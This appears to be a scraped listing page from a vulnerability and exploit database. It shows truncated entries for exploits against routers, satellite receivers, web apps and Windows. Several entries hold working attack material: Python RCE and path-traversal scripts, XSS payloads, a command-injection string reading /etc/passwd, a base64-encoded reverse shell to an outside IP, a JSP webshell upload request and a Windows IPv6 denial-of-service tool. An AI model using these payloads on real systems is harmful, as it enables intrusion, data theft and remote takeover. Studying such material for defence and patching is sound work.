?day POC 漏洞数据库

# Exploit Title: Remote Command Execution | Aurba 501 # Date: 17-07-2024 # Exploit Author: Hosein Vita # Vendor Homepage: https://www.hpe.com # Version: Aurba 501 CN12G5W0XX # Tested on: Linux import requests from requests.auth import HTTPBasicAuth def get_input(prompt, default_value): user_input = input(prompt) return user_input if user_input else default_value base_url = input("Enter the base URL: ") if not base_url: print("Base URL is required.") exit(1) username = get_input("Enter the username (default: admin): ", "admin") password = get_input("Enter the password (default: admin): ", "admin") login_url = f"{base_url}/login.cgi" login_payload = …

Debian: CVE-2025-24531: pam-pkcs11 -- security update Severity 4 CVSS (AV:L/AC:M/Au:N/C:P/I:P/A:P) Published 02/14/2025 Created 02/15/2025 Added 02/14/2025 Modified 02/14/2025 Description Possible Authentication Bypass in Error Situations Solution(s) debian-upgrade-pam-pkcs11 References https://attackerkb.com/topics/cve-2025-24531 CVE - 2025-24531 DSA-5864-1

# Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path # Date: 2024-07-31 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://www.oracle.com/ # Software Link: https://www.oracle.com/ # Version: 12c Release 1 # Tested on: Windows 10 Pro x64 C:\>sc qc "OracleDBConsoleorcl" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleDBConsoleorcl TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME …

# Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path # Date: 2024-07-31 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://www.kiwisyslog.com/ # Software Link: https://www.kiwisyslog.com/downloads # Version: Software Version 9.6.7.1 # Tested on: Windows 10 Pro x64 1. Description: SolarWinds Kiwi Syslog Server 9.6.7.1 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs 2. Proof C:\>sc qc "Kiwi Syslog Server" [SC] QueryServiceConfig SUCCESS SERVI…

#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path #Exploit Author : SamAlucard #Exploit Date: 2024-07-31 #Vendor : Genexus #Version : Genexus Protection Server 9.7.2.10 #Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;; #Vendor Homepage : https://www.genexus.com/es/ #Tested on OS: Windows 10 Pro #Analyze PoC : ============== C:\>sc qc protsrvservice [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: protsrvservice TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program …

# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter # Google Dork: N/A # Date: 2024-06-29 # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/X) # Vendor Homepage: https://devikaai.co/ # Software Link: https://github.com/stitionai/devika # Version: v1 # Tested on: Windows 11 Home Edition # CVE: CVE-2024-40422 #!/usr/bin/python import argparse import requests def exploit(target_url): url = f'http://{target_url}/api/get-browser-snapshot' params = { 'snapshot_path': '../../../../etc/passwd' } response = requests.get(url, params=params) print(response.text) if __name__ == "__main__": parser = argparse.ArgumentPar…

# Exploit Title: Stored XSS in Calibre-web # Date: 07/05/2024 # Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache) # Vendor Homepage: (https://github.com/janeczku/calibre-web/) # Version: 0.6.21 - Romesa # Tested on: Linux 5.15.0-107, Python 3.10.12, lxml 4.9.4 # CVE: CVE-2024-39123 ## Vulnerability Description Calibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Upload a new book. 3. Access the Books List …

# Exploit Title: Stored XSS Vulnerability via File Name # Google Dork: N/A # Date: 08 Aug 2024 # Exploit Author: Md. Sadikul Islam # Vendor Homepage: https://www.helpdeskz.com/ # Software Link: https://github.com/helpdesk-z/helpdeskz-dev/archive/2.0.2.zip # Version: v2.0.2 # Tested on: Kali Linux / Firefox 115.1.0esr (64-bit) # CVE : N/A Payload: "><img src=x onerror=alert(1);> Filename can be Payload: "><img src=x onerror=alert(1);>.jpg VIdeo PoC: https://drive.google.com/file/d/1_yh0UsX8h7YcSU1kFvg_bBwk9T7kx1K1/view?usp=drive_link Steps to Reproduce: 1. Log in as a regular user and create a new ticket. 2. Fill out all the required fields wi…

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.5.179 Revision 904 1.5.56 Revision 884 1.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a…

Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.5.179 Revision 904 1.5.56 Revision 884 1.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a cheap b…

Elber Wayber Analog/Digital Audio STL 4.00 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayb…

# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset # Date: 7/16/24 # Exploit Author: Simon Greenblatt <simongreenblatt[at]protonmail.com> # Vendor: HughesNet # Version: Arcadyan httpd 1.0 # Tested on: Linux # CVE: CVE-2021-20090 import sys import requests import re import base64 import hashlib import urllib red = "\033[0;41m" green = "\033[1;34;42m" reset = "\033[0m" def print_banner(): print(green + ''' _____________ _______________ _______________ ________ ____ _______________ _______ _______________ \_ ___ \ \ / /\_ _____/ \_____ \ _ \ \_____ \/_ | \__…

Elber Wayber Analog/Digital Audio STL 4.00 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayber II is…

漏洞描述金盘 微信管理平台 getsysteminfo接口存在未授权访问漏洞，攻击者通过漏洞可以获取账号密码信息，获取后台管理员权限。 漏洞影响金盘 微信管理平台 网络测绘title=”微信管理后台” && icon_hash=”116323821″ 漏洞复现登陆页面 验证POC /admin/weichatcfg/getsysteminfo

#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service # Date: 2024-08-07 # Exploit Author: Photubias # Vendor Homepage: https://microsoft.com # Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063 # Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189 # Tested on: Windows 11 23H2 and Windows Server 2022 # CVE: CVE-2024-38063 import os, subprocess, re, time, sys ## Variables sDstIP = 'fe80::78b7:6283:49ad:c565' ## Placeholder if len(sys.argv) > 1: sDstIP = sys.argv[1] ## Please provide an argument sDstMAC = '00:0C:29:55…

# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE) # Discovered By: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave) # Exploit Author: Alessio Romano (sfoffo), Riccardo Degli Esposti #(partywave) # Date: 23/08/2024 # Vendor Homepage: https://invesalius.github.io/ # Software Link: #https://github.com/invesalius/invesalius3/tree/master/invesalius # Version: 3.1.99991 to 3.1.99998 # Tested on: Windows # CVE: CVE-2024-42845 # External References: #https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845, #https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845, #https://www.partywave.site/show/research/Tic%20T…

# Exploit Title: Stored XSS in Gitea # Date: 27/08/2024 # Exploit Authors: Catalin Iovita & Alexandru Postolache # Vendor Homepage: (https://github.com/go-gitea/gitea) # Version: 1.22.0 # Tested on: Linux 5.15.0-107, Go 1.23.0 # CVE: CVE-2024-6886 ## Vulnerability Description Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$…

# Exploit Title: Stored XSS in NoteMark # Date: 07/29/2024 # Exploit Author: Alessio Romano (sfoffo) # Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/ # Version: 0.13.0 and below # Tested on: Linux # References: https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819, https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182, https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3 # CVE: CVE-2024-41819 ## Steps to Reproduce 1. Log in to the application. 2. Create a new note or enter a previously created note. 3. Access the note editor functionality from the selected note by clicking on the "…

# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE) # Date: 9/21/2024 # Exploit Author: Ahmed Said Saud Al-Busaidi # Vendor Homepage: https://github.com/vexorian/dizquetv # Version: 1.5.3 # Tested on: linux POC: ## Vulnerability Description dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers. ## STEPS TO REPRODUCE 1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'" 3. click on update 4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

# Exploit Title: openSIS 9.1 - SQLi (Authenticated) # Google Dork: intext:"openSIS is a product" # Date: 09.09.2024 # Exploit Author: Devrim Dıragumandan (d0ub1edd) # Vendor Homepage: https://www.os4ed.com/ # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1 # Version: 9.1 # Tested on: Linux A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1 --- Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY o…

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated) # Date: 2024-09-29 # Exploit Author: Caner Tercan # Vendor Homepage: https://rengine.wiki/ # Software Link: https://github.com/yogeshojha/rengine # Version: v2.2.0 # Tested on: macOS POC : 1. Login the Rengine Platform 2. Click the Scan Engine 3. Modify any Scan Engine 4. I modified nmap_cmd parameters on yml config 5. Finally, add a target in the targets section, select the scan engine you edited and start scanning. payload : 'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKT…

# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated) # Date: 6th October, 2024 # Exploit Author: Ardayfio Samuel Nii Aryee # Version: 1.52.01 # Tested on: Ubuntu import argparse import requests import random import string import urllib.parse def command_shell(exploit_url): commands = input("soplaning:~$ ") encoded_command = urllib.parse.quote_plus(commands) command_res = requests.get(f"{exploit_url}?cmd={encoded_command}") if command_res.status_code == 200: print(f"{command_res.text}") return print(f"Error: An erros occured while running command: {encoded_command}") def exp…

漏洞描述Adobe ColdFusion存在任意文件上传漏洞，通过漏洞攻击者可上传任意文件控制服务器。 漏洞影响Adobe ColdFusion 网络测绘app=”Adobe-ColdFusion” 漏洞复现产品官网 发送数据包上传任意文件 POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1Host: User-Agent: Go-http-client/1.1 Content-Length: 918 Content-Type: multipart/form-data; boundary=e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Accept-Encoding: gzip --e9fb732e96144291860c4d742145cdabf98a4ec5cbe2a91aec6dc17461a0 Content-Disposition: form-data; name="file"; filename="b79f4282c451e975c357d9616acea7ba.jsp" Content-Type: application/octet-stream <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLo…

漏洞描述Jupyter Notebook（此前被称为 IPython notebook）是一个交互式笔记本，支持运行 40 多种编程语言。 如果管理员未为Jupyter Notebook配置密码，将导致未授权访问漏洞，游客可在其中创建一个console并执行任意Python代码和命令。 漏洞影响Jupyter Notebook 网络测绘app=”Jupyter-Notebook” && body=”Terminal” 漏洞复现访问目标, 点击 Terminal 打开命令行界面 执行命令并反弹shell